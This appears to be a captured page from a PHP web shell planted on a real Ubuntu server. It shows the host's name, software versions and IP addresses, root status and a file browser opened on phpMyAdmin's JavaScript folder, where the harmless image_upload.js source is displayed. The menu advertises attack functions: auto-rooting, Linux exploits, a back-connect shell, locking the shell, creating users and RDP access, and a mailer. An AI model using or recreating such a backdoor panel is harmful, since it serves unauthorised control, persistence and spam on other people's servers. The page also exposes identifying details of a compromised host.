Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
js /
transformations /
[ HOME SHELL ]
Name
Size
Permission
Action
image_upload.js
831
B
-rw-r--r--
json.js
668
B
-rw-r--r--
json_editor.js
476
B
-rw-r--r--
sql_editor.js
312
B
-rw-r--r--
xml.js
664
B
-rw-r--r--
xml_editor.js
412
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : image_upload.js
/* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Image upload transformations plugin js * * @package PhpMyAdmin */ AJAX.registerOnload('transformations/image_upload.js', function() { // Change thumbnail when image file is selected // through file upload dialog $('input.image-upload').on('change', function(event) { if (this.files && this.files[0]) { var reader = new FileReader(); var $input = $(this); reader.onload = function (e) { $input.prevAll('img').attr('src', e.target.result); }; reader.readAsDataURL(this.files[0]); } }); }); /** * Unbind all event handlers before tearing down a page */ AJAX.registerTeardown('transformations/image_upload.js', function() { $('input.image-upload').off('change'); });
Close